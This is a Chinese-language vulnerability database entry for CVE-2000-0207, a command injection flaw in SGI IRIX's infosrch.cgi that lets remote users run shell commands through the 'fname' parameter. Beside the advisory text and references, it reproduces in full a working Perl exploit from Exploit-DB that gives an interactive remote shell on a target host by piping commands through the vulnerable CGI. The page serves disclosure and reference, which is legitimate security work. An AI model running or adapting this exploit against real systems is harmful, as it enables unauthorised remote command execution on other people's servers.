SGI IRIX InfoSearch CGI远程执行任意命令漏洞

SGI IRIX InfoSearch CGI远程执行任意命令漏洞

漏洞ID 1105745 漏洞类型 输入验证
发布时间 2000-03-05 更新时间 2005-07-27
图片[1]-SGI IRIX InfoSearch CGI远程执行任意命令漏洞-安全小百科CVE编号 CVE-2000-0207
图片[2]-SGI IRIX InfoSearch CGI远程执行任意命令漏洞-安全小百科CNNVD-ID CNNVD-200003-001
漏洞平台 IRIX CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/19788
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-001
|漏洞详情
InfoSearch是SGIIRIX操作系统所带的CGI程序,用来查看在线图书,man页和发布消息。软件包中的infosrch.cgi脚本实现上存在输入验证漏洞,远程攻击者可能利用此漏洞对在Web进程的权限在主机上执行任意命令。infosrch.cgi脚本在将’fname’变量的传送给man2html程序前,它没有正确检查参数内容,远程攻击者可以在输入中混入SHELL转义字符比如”;”从而在主机上执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1031/info

The InfoSearch package converts man pages and other documentation into HTML web content. The search form uses infosrch.cgi which does not properly parse user input in the 'fname' variable, allowing commands to be executed at the webserver privilege level by remote web users.


#!/usr/bin/perl -w
# infosearch.cgi interactive shell. 
# usage: ./infosh.pl hostname
# 3/4/00
# --rpc <[email protected]>

use IO::Socket;
use CGI ":escape";
$|++;

die "usage: $0 hostn" unless(@ARGV == 1);
($host) = shift @ARGV;

$cgi = "/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|";

# url encode and send a command.
sub send_cmd
{
	my($url_command) = $cgi . CGI::escape(shift);
	$s = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>"tcp");
	if(!$s) { die "denied.n"; }	
	print $s "GET $url_command HTTP/1.0rn";
	print $s "User-Agent: rnrn";
	@result = <$s>;
	shift @result until $result[0] =~ /^rn/; # uninteresting data. 
	shift @result; $#result--;		
return @result;
}

# draw a pseudo prompt. i like "h:w $ ".
sub prompt
{
	@res = send_cmd("/sbin/pwd");	
	chomp($pwd = $res[0]);
	print "$host:", $pwd, "$ ";
}

prompt;
while(!eof(STDIN)) {
	chomp($cmd = <STDIN>);
	print send_cmd($cmd);
	prompt;
}
|参考资料

来源:BID
名称:1031
链接:http://www.securityfocus.com/bid/1031
来源:SGI
名称:20000501-01-P
链接:ftp://patches.sgi.com/support/free/security/advisories/20000501-01-P
来源:NSFOCUS
名称:361
链接:http://www.nsfocus.net/vulndb/361

相关推荐: e107 Website System Global Variables Unauthorized Access Vulnerability

e107 Website System Global Variables Unauthorized Access Vulnerability 漏洞ID 1096654 漏洞类型 Access Validation Error 发布时间 2005-05-10 更…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享